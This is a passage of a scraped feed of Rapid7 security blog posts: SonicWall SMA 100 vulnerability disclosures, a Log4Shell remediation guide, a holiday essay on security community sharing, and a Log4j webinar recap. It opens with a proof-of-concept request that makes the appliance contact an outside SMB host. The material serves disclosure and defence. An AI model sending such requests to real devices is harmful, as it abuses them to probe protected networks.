\"https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://8.8.8.8:80/test&Arg2=test&User=test&Pass=test\"`\n\n### CVE-2021-20042 exploitation impact\n\nThere are two significant limitations to this attack:\n\n * The attacker does have to honor the third-party SMB server's authentication. So to read/write, they'll need credentials (or anonymous/guest access).\n * An unauthenticated attacker will not see responses, so the attack will be blind. Determining the result of an attack/scan will rely on timing and server error codes.\n\nGiven these constraints, an attacker does not command complete control of resources on the protected side of the network with this issue and is likely only able to map responsive services from the protected network (with the notable exception of being able to write to, but not read from, unprotected SMB shares).\n\n## Vendor statement\n\n_SonicWall routinely collaborates with third-party researchers, penetration testers, and forensic analysis firms to ensure that its products meet or exceed security best practices. One of these valued allies, Rapid7, recently identified a range of vulnerabilities to the SMA 100 series VPN product line, which SonicWall quickly verified. SonicWall designed, tested, and published patches to correct the issues and communicated these mitigations to customers and partners. At the time of publishing, there are no known exploitations of these vulnerabilities in the wild._\n\n## Remediation\n\nAs these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates.\n\n## Disclosure timeline\n\n * October, 2021: Issues discovered by Jake Baines of Rapid7\n * Mon, Oct 18, 2021: Initial disclosure to SonicWall via [PSIRT@sonicwall.com](<mailto:PSIRT@sonicwall.com>)\n * Mon, Oct 18, 2021: Acknowledgement from the vendor\n * Thu, Oct 28, 2021: Validation completed and status update provided by the vendor\n * Thu, Nov 9, 2021: Test build with updates provided by the vendor\n * Tue, Dec 7, 2021: [SNWLID-2021-0026 released](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) by the vendor to customers\n * Wed, Dec 7, 2021: Vulnerability checks available to InsightVM and Nexpose customers for all CVEs in this disclosure\n * Tue, Jan 11, 2022: This public disclosure\n * Tue, Jan 11, 2022: [Module for CVE-2021-20039 PR#16041](<https://github.com/rapid7/metasploit-framework/pull/16041>) provided to Metasploit Framework\n * Tue, Jan 11, 2022: Rapid7 analyses published for [CVE-2021-20038](<https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis>) and [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis>) in AttackerKB.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T14:00:00", "type": "rapid7blog", "title": "CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042"], "modified": "2022-01-11T14:00:00", "id": "RAPID7BLOG:896942D0CDF4701FAF0531A15C44DA19", "href": "https://blog.rapid7.com/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-11T09:03:50", "description": "## Summary\n\n\n\nOn December 7, 2021, SonicWall released a [security advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) that includes patching guidance for **five vulnerabilities in SonicWall SMA 100 series devices that were discovered by Rapid7** (including CVE-2021-20038 which is rated CVSSv3 9.8, critical), as well as several other CVEs discovered by NCC Group. While exploitation has not yet started for these vulnerabilities, SonicWall \u201cstrongly urges\u201d organizations to apply the appropriate patches.\n\nFrom SonicWall\u2019s advisory:\n\nIssue ID | Summary | CVE | CVSS | Reporting Party | Impacted Versions \n---|---|---|---|---|--- \nSMA-3217 | Unauthenticated Stack-Based Buffer Overflow | CVE-2021-20038 | 9.8 | Rapid7 | 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv \nSMA-3204 | Authenticated Command Injection | CVE-2021-20039 | 7.2 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3206 | Unauthenticated File Upload Path Traversal | CVE-2021-20040 | 6.5 | Rapid7, NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3207 | Unauthenticated CPU Exhaustion | CVE-2021-20041 | 7.5 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3208 | Unauthenticated Confused Deputy | CVE-2021-20042 | 6.3 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3231 | Heap-Based Buffer Overflow | CVE-2021-20043 | 8.8 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3233 | Post-Authentication Remote Command Execution | CVE-2021-20044 | 7.2 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3235 | Multiple Unauthenticated Heap-Based and Stack Based Buffer Overflow | CVE-2021-20045 | 9.4 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \n \n## Affected versions\n\nThe issues listed above impact SMA 100 series appliances (SMA 200, 210, 400, 410, 500v).\n\n## Full disclosure scheduled for January 2022\n\nRapid7 will release the technical details and proof-of-concept code in January 2022 as part of our coordinated vulnerability disclosure process.\n\n## Guidance\n\nAs with all critical, network-edge appliances, Rapid7 recommends that vulnerabilities be patched immediately. SonicWall devices have [previously been exploited at scale](<https://attackerkb.com/topics/BFh8B71dfn/sonicwall-sma-100-series-10-x-firmware-zero-day-vulnerability/rapid7-analysis?referrer=blog>) in 2021 and are generally high-value targets for attackers. SonicWall does not list any workarounds for these issues. For more information, see SonicWall\u2019s [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all eight of the CVEs in [this advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) with vulnerability checks in the December 7, 2021 content release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-08T18:57:52", "type": "rapid7blog", "title": "Patch Now: SonicWall Fixes Multiple Vulnerabilities in SMA 100 Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042", "CVE-2021-20043", "CVE-2021-20044", "CVE-2021-20045"], "modified": "2021-12-08T18:57:52", "id": "RAPID7BLOG:000305BC832103845A712987C0E849E4", "href": "https://blog.rapid7.com/2021/12/08/patch-now-sonicwall-fixes-multiple-vulnerabilities-in-sma-100-devices/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-08T23:04:20", "description": "\n\n_This post is co-authored by Blake Cifelli, Senior Advisory Services Consultant._\n\nIn today\u2019s cybersecurity world, risks evolve faster than we can remediate them. To meet our goals and become resilient to these fast changes, we need the right balance of automation and human interaction. Enabling rapid response for protecting information systems is paramount, but how does a business reach this level of reaction?\n\nHow can organizations maintain a standard of excellence to their responses in high-risk situations?\n\nWhere do you even begin to respond to a critical vulnerability like [the one in Apache\u2019s Log4j Java library (a.k.a. Log4Shell)](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)?\n\nMost importantly, how do we transform the tactical actions that need to take place into an effective strategy to scale?\n\n## 1\\. Empower personnel\n\nThe personnel with the knowledge about your various solutions must be empowered to make the decisions necessary to address your company\u2019s information technology needs. If those team members don\u2019t feel they can make those decisions, then they will defer to management \u2014 but managers may not know the intricacies of the solutions and could create a natural bottleneck, since there are going to be more decision points than managers to make decisions. Providing personnel with policy documents with uniform criteria for evaluating the risk these new vulnerabilities present, the ways to respond, and the time expectations is paramount for a timely resolution.\n\nIn a typical risk resolution process, there are many gates to safeguard our systems. This helps ensure that whatever change happens increases the solution\u2019s confidentiality, integrity, or availability rather than diminishing it. However, a situation like Log4Shell needs to be treated like an incident response activity to quickly address the risk. Create a task force to effectively answer the important questions like:\n\n * How do we find vulnerable systems?\n * Which systems are vulnerable?\n * What options are there for a fix? One size may not fit all.\n * Who is going to track changes?\n * Who is going to validate the fix is in place?\n\nUtilizing a strong incident response procedure to answer all these questions will assist with prioritization and remediation to an acceptable level of risk.\n\n## 2\\. Promote visibility\n\nAny standard [vulnerability management lifecycle](<https://www.rapid7.com/fundamentals/vulnerability-management-program-framework/>) process begins with identifying affected systems to assess and evaluate the scope of a vulnerability\u2019s presence on the network. The approach should utilize both proactive and reactive efforts through a combination of tools and well-documented processes to streamline and scale the response effectively.\n\nA proactive process would first involve having well-documented use of any such library versions internally in an inventory, so that discoverability and traceability are much more narrowly focused efforts. If you conduct authenticated vulnerability scans continuously on pre-scheduled frequencies, this will also help with identification of third-party software utilizing this library over time. Classifying system criticality within the vulnerability management tool will help you more effectively scale future remediation processes.\n\nThese proactive processes help jumpstart an initial response, but you\u2019ll still need reactive efforts to help ensure effective and timely remediation. [Vulnerability scanning](<https://www.rapid7.com/fundamentals/vulnerability-management-and-scanning/>) tools will receive signature updates regarding this newly discovered vulnerability, which will require updating your vulnerability management tool and initiating one-off alternative scans that may deviate from pre-scheduled rotations. These alternative scans should include tiered phases, so the most critical systems receive scan priority, and then remaining systems are scanned in order of criticality. Leveraging the pre-existing system criticality classification will significantly expedite this process.\n\nA [security incident and event management (SIEM)](<https://www.rapid7.com/fundamentals/siem/>) tool can also assist with identifying, tracking, and alerting for any suspicious activity that may be tied to exploitation of this vulnerability. Host agents and network detection systems that report back to the SIEM should be closely monitored, and any activity or traffic that deviates from baselines should receive an active response. You may need to adjust logging and alerting rules and thresholds to ensure your efforts are strategically focused.\n\nTactical processes help you achieve this continuous identification, but you still need to orchestrate and execute them through strategic planning to remain timely, efficient, and effective. Well-documented asset inventories and appropriate system criticality classifications help you prioritize your efforts, while continuous vulnerability scans and leveraging vulnerability management and SIEM tools help to identify, track, and manage vulnerability exposure. Leadership should provide the direction to guide these activities from inception to implementation through effective communication and allocation of resources. Lay out a short-term roadmap for tracking objectives and quick wins as part of the remediation process, so you can quickly and concisely show how you\u2019re tracking toward goals.\n\n## 3\\. Implement prioritization and mitigation\n\nNow that your team has successfully identified all affected systems, you\u2019ll need to roll out patches to those systems on a continuous basis during the next phase to mitigate risk. Current enterprise-wide patching timelines may require adjustment due to the urgency associated with such critical vulnerabilities. Patch testing and rollout phases must be expedited to support a more timely and effective response.\n\nMuch like conducting our vulnerability scans in terms of system criticality prioritization, our [patch management](<https://www.rapid7.com/fundamentals/patch-management/>) response should follow a similar approach, with the caveat that a pilot group or pilot system deemed non-critical should be patched first for testing purposes to ensure no adverse effects prior to rolling out patches in order of system criticality. If you\u2019ve configured a full test environment is configured, you can test patches on critical systems first within that environment and then roll them out in production according to criticality. The testing timeline itself should be reduced throughout all standard phases of a testing cycle \u2014 you may even need to eliminate certain testing phases altogether. The rollout timelines for patches across all systems will need to be expedited as well to ensure as timely coverage as possible. If your environment has widespread use of the vulnerable library, you may require reductions in timelines of anywhere from 25% to 50%.\n\nEmergency patching procedures should provide for timely testing and production rollouts within roughly half the time of a normal patching cycle, or 5 to 10 days at a maximum for critical systems to minimize breach potential as quickly as possible. Also keep in mind that some vulnerabilities may involve more than just application of a simple patch \u2014 configuration changes may also be necessary to further mitigate potential exploitation by an adversary.\n\n## 4\\. Validate remediation\n\nNow, you\u2019ve deployed patches to all affected systems, so the mitigation efforts are complete, right? While you may want to shift your focus back to other tasks, it\u2019s essential to maintain continuous identification processes to ensure that no stone remains unturned.\n\nThe vulnerability management validation phase leverages those reactive identification processes, in addition to patch management processes, to assist in efficient and effective vulnerability remediation for affected systems. This stage involves re-scanning initially identified vulnerable systems to assess successful patch application and performing additional open scans of the network to ensure that there are no lingering systems that may still be affected by the vulnerability but weren\u2019t originally identified \u2014 or perhaps weren\u2019t successfully patched as part of the patch management process. This cycle of continuous validation will remain in effect until \u201cclean\u201d scans are reported across the enterprise regarding this vulnerability.\n\nSince the Log4j logging library is widely used throughout many enterprise applications and even unknowingly embedded in so many others, continuous validation will become crucial in ensuring your organization remains vigilant and can mitigate the vulnerability quickly and effectively as you continue to discover affected systems.\n\n## 5\\. Regularly review risks\n\nA vulnerability management lifecycle rarely ever comes to a true end. As adversaries and security evangelists further evaluate a specific vulnerability over time, new methods of exploitation are identified, affected versions increase in scope and scale, and recent patches and fixes are found to be ineffective. This leaves organizations potentially open to exposure and at a loss for the best path forward. Continuous review of the trends surrounding an ongoing critical vulnerability will help organizations ensure they remain both aware of the impact and the current mitigating measures that have been most successful. Additionally, leveraging other solutions can help further identify and launch a coordinated defense-in-depth response to any potential malicious activity that may be associated with such vulnerabilities.\n\nWorking to continuously identify, mitigate, validate, and review vulnerabilities throughout their inevitable course will require commitment and fortitude to achieve the best results, but once the tides have subsided with Log4Shell and you\u2019ve successfully and securely endured one of the worst security vulnerability exposures in a decade by following these processes, you can rest assured that your incident response processes were well-tested during this endeavor \u2014 and your IT security budget should be more than solidified for the next few years to come. \n\nCheck out our additional resources for further insight of this vulnerability, mitigating measures, and tools available to assist.\n\n * [Log4Shell Resource Hub](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)\n * [Log4Shell Resources for Rapid7 Customers](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>)\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [Update on Log4Shell\u2019s Impact on Rapid7 Solutions and Systems](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>)\n * [Using InsightVM to Find Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>)\n * [InsightVM Docs page for Log4j](<https://docs.rapid7.com/insightvm/apache-log4j/>)\n * [Rapid7 analysis of Log4Shell on AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:20:22", "type": "rapid7blog", "title": "Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T18:20:22", "id": "RAPID7BLOG:7F1312E79E0925118565C90443170051", "href": "https://blog.rapid7.com/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-03T15:13:33", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our [Hacky Holidays](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>) blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nMy kid stopped believing this year.\n\nI did what they recommend: said she was big enough to know the truth, that we are all Santas, and now she must be one, too. Every one of us \u2014 whether December means Christmas, Hanukkah, Kwanzaa, or just winter \u2014 is expected to give generously and sometimes anonymously, just to spread the goodness. And ideally, we do it a whole lot more than once a year.\n\nThen, the a-ha moment arrived. You know who some of the best Santas on Earth are? The cybersecurity community. It\u2019s full of givers, mostly with names we\u2019ll never know. \n\nRewind to the early years of the internet: A 15-year-old [hacked the source code](<https://abcnews.go.com/Technology/story?id=119423&page=1>) for NASA\u2019s International Space Station; Russians [extracted $10 million](<https://www.latimes.com/archives/la-xpm-1995-08-19-fi-36656-story.html>) from Citibank; the Department of Justice and Los Alamos National Laboratory (site of the Manhattan Project and home to classified nuclear and weapons secrets) were breached. \n\n## What happened next? Organized beneficence\n\nIn 1999, [MITRE researchers](<https://cve.mitre.org/docs/docs-2002/prog-rpt_06-02/index.html>) released the first searchable public record of 321 common vulnerabilities. In less than 3 years, there were 2,000+ vulnerabilities shared. By 2013, the effort resulted in the MITRE ATT&CK Framework that documented attacker tactics and techniques based on real-world observations of advanced persistent threat actors. With this framework, the security community has a common language and library to understand attackers \u2014 and what we can do to stop them.\n\nMITRE ATT&CK is open and available to anyone for use at no charge. Of course, detailed ATT&CK mapping is part of [InsightIDR\u2019s](<https://www.rapid7.com/products/insightidr/>) vast library of critical attacker behaviors and endpoint detections. \n\nNot long after MITRE published its first vulnerabilities, military systems at the Pentagon and NASA were breached by [a guy looking for evidence of UFOs](<https://www.bbc.com/news/uk-19946902>). The fun never ends. That same year, security expert and open source guru [H.D. Moore released](<https://www.oreilly.com/library/view/metasploit/9781593272883/pr04s03.html>) the first edition of his Metaspoit Project with 11 exploits. Metasploit 2.0 followed quickly. With the 3.0 release, users began to contribute and a community was born.\n\nToday, [Rapid7\u2019s Metasploit](<https://www.rapid7.com/products/metasploit/>) is a voluntary collaboration between 300,000+ users and contributors around the world, including Rapid7 security engineers. It includes more than 1677 exploits organized over 25 platforms, and nearly 500 payloads. And it\u2019s a favorite of pen testers and red teamers worldwide.\n\n## The Cyber Threat Alliance took everything up a notch\n\nA nonprofit working to improve the security of our global digital ecosystem by enabling near real-time, high-quality threat information sharing, the [Cyber Threat Alliance (CTA)](<https://www.rapid7.com/blog/post/2021/10/13/security-nation-michael-daniel-on-the-cyber-threat-alliance/>) has staff and a technology platform for sharing advanced threat data. CTA members \u2014 often competitors \u2014 work together in good faith to distribute timely, actionable, contextualized, and campaign-based intelligence. \n\nRapid7 is among the members who, on average, share 5 million observable events per month. And the result: We all get ever-better at thwarting adversaries and improving our collective security. \n\n## In 2017, the holiday spirit became a quarterly thing for us\n\nThat\u2019s the year Rapid7 released our first threat intelligence report. Today, our quarterly Threat Reports share clear, distilled learnings and practical guidance from the wealth of data we continuously gather. Our sources include:\n\n * [Metasploit](<https://www.metasploit.com/>), now the world\u2019s most used pen testing framework\n * Rapid7\u2019s [Insight platform](<https://www.rapid7.com/products/insight-platform/>), covering vulnerability management, application security, detection and response, external threat intelligence, orchestration and automation, and more\n * Rapid7\u2019s [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities typically unknown to IT teams\n * [Project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), a globally distributed, low-interaction honeypot network that monitors for malicious inbound connections, and a forum for collaboration and confirmation relationships with other internet-scale researchers\n * Our global network of [Managed Detection and Response](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) (MDR) SOCs that use and vet Rapid7 products, do proactive threat hunting along with daily triage and remote incident response, and provide raw intelligence around emergent threats \n\nThe Internet connects everyone and everything with no centralized control. We put it together that way, and there\u2019s clearly no grand plan to make it secure. So we step up. Every time the malware operation Emotet resurfaces, a group of security researchers and system administrators reunites to fight it. (The only name we really know is what they call themselves: \u201cCryptolaemus.\u201d That\u2019s a mealy bug that goes after unhealthy plants.)\n\n## Yes, humans are cybersecurity\u2019s weakest link, but... \n\nMy father-in-law sent a $300 gift card to a hacker. We\u2019re easy marks, ruled by emotions that haven\u2019t changed much since we were cave-dwelling Paleolithic hominins. \n\nBut we\u2019re also us. You. \n\nWhatever winter holiday you celebrated, here\u2019s hoping it was a good one. And that you raised a glass to all the good folks, the good fight. Don\u2019t stop believing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n**More Hacky Holidays blogs**\n\n * [Hacky Holidays: Celebrating the Best of Security Nation [Video]](<https://www.rapid7.com/blog/post/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/>)\n * [Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-03T15:00:00", "type": "rapid7blog", "title": "Sharing the Gifts of Cybersecurity \u2013 Or, a Lesson From My First Year Without Santa", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-03T15:00:00", "id": "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "href": "https://blog.rapid7.com/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T20:18:00", "description": "\n\n[CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>) rules everything around us \u2014 or so it seemed, at least, for those breathless days in December 2021 when the full scope of [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) was starting to take hold and security teams were strapped for time and resources as they scoured their organizations' environments for vulnerable instances of Apache Log4j. But now that the peak intensity around this vulnerability has waned and we've had a chance to catch our collective breath, where does the effort to patch and remediate stand? What should security teams be focusing on today in the fight against Log4Shell?\n\nOn Wednesday, February 16, Rapid7 experts Bob Rudis, Devin Krugly, and Glenn Thorpe sat down for a webinar on the current state of the Log4j vulnerability. They covered where Log4Shell stands now, what the future might hold, and what organizations should be doing proactively to ensure they're as protected as possible against exploits.\n\n## Laying out the landscape\n\nGlenn Thorpe, Rapid7's Program Manager for Emergent Threat Response, kicked things off with a recap and retrospective of Log4Shell and why it seemingly set fire to the entire internet for a good portion of December. The seriousness of this vulnerability is due to the coming-together of several key factors, including:\n\n * The ability for vulnerable systems to grant an attacker full administrative access\n * The low level of skill required for exploitation \u2014 in many cases, attackers simply have to copy and paste\n * The attack vector's capability to run undetected over an encrypted channel\n * The pervasiveness of the Log4j library, which means vulnerability scanners alone can't act as complete solutions against this threat\n\nPut all this together, and it's no surprise that the volume of exploit attempts leveraging the Log4j vulnerability ramped up throughout December 2021 and has continued to spike periodically throughout January and February 2022. By January 10, ransomware using Log4Shell had been observed, and on January 14, Rapid7's MDR saw [mass Log4j exploits in VMware products](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>).\n\nBut while there's certainly been plenty of Log4j patching done, the picture on that front is far from complete. According to the [latest CISA data](<https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md>) (also [here](<https://docs.google.com/spreadsheets/d/1jidw2hK4zeIwjR5kdzqRzYT04GWP6LSTGLoXvSRSENE/edit#gid=0>) as a daily-updated spreadsheet), there are still 320 cataloged software products that are known to be affected by vulnerable Log4j as of February 16, 2022 \u2014 and 1,406 still awaiting confirmation from the vendor.\n\n\n\n## Log4j today: A new normal?\n\nSo, where does the effort to put out Log4j fires stand now? Devin Krugly, Rapid7's Practice Advisor for Vulnerability Risk Management, thinks we're in a better spot than we were in December \u2014 but we're by no means out of the woods.\n\n\"We're effectively out of fire-fighting mode,\" said Devin. That means that, at this point, most security teams have identified the affected systems, implemented mitigations, and patched vulnerable versions of Log4j. But because of the complexity of today's software supply chains, there are often heavily nested dependencies within vendor systems \u2014 some of which Log4j may still be implicated in. This means it's essential to have a solid inventory of vendor software products that may be using Log4j and to ensure those instances of the library are updated and patched.\n\n\"Don't lose that momentum,\" Glenn chimed in. \"Don't put that on your post-mortem action list and forget about it.\"\n\nThis imperative is all the more critical because of a recent uptick in Log4Shell activity. Rapid7's Chief Data Scientist Bob Rudis laid out some [activity detected by the Project Heisenberg honeypot fleet](<https://www.rapid7.com/research/project-doppler/>) indicating a revival of Log4j activity in early and mid-February, much of it from new infrastructure and scanning hosts that hadn't been seen before.\n\nAmid this increase in activity, vulnerable instances of Log4j are anything but gone from the internet. In fact, data from [Sonatype](<https://www.sonatype.com/resources/log4j-vulnerability-resource-center>) as of February 16, 2022 indicates 39% of Log4j downloads are _still _versions vulnerable to Log4Shell.\n\n\u201cWe're going to be seeing Log4j attempts on the internet, on the regular, at a low level, forever,\" Bob said. Log4Shell is now in a family with WannaCry and Conficker (yes, that Conficker) \u2014 vulnerabilities that are around indefinitely, and which we'll need to continually monitor for as attackers use them to try to breach our defenses.\n\n## Navigating life with Log4Shell\n\nAdopting a defense-in-depth posture in the \"new normal\" of life with Log4Shell is sure to come with its share of headaches. Luckily, Bob, Devin, and Glenn shared some practical strategies that security teams can adopt to keep their organizations' defenses strong and avoid some common pitfalls.\n\n### Go beyond compensating controls\n\n\"My vendor says they've removed the JNDI class from the JAR file \u2014 does that mean their application is no longer vulnerable to Log4Shell?\" This question came up in a few different forms from our webinar audience. The answer from our panelists was nuanced but crystal-clear: maybe for now, but not forever.\n\nRemoving the JNDI class is a compensating control \u2014 one that provides a quick fix for the vulnerability but doesn't patch the core, underlying problem via a full update. For example, when you do a backup, you might unknowingly reintroduce the JNDI class after removing it \u2014 or, as Devin pointed out, an attacker could chain together a replacement for it.\n\nThese kinds of compensating or mitigating controls have their place in a short-term response, but there's simply no action that can replace the work of upgrading all instances of Log4j to the most up-to-date versions that contain patches for Log4Shell.\n\n\"Mitigate for speed, but not in perpetuity,\" Glenn recommended.\n\n### Find the nooks and crannies\n\nToday's cloud-centric IT environments are increasingly ephemeral and on-demand \u2014 a boost for innovation and speed, but that also means teams can deploy workloads without security teams ever knowing about it. Adopting an \"Always Be Scanning\" mindset, as Bob put it, is essential to ensure vulnerable instances of Log4j aren't introduced into your environment.\n\nContinually scanning your internet-facing components is a good and necessary start \u2014 but the work doesn't end there. As Devin pointed out, finding the nooks and crannies where Log4j might crop up is critical. 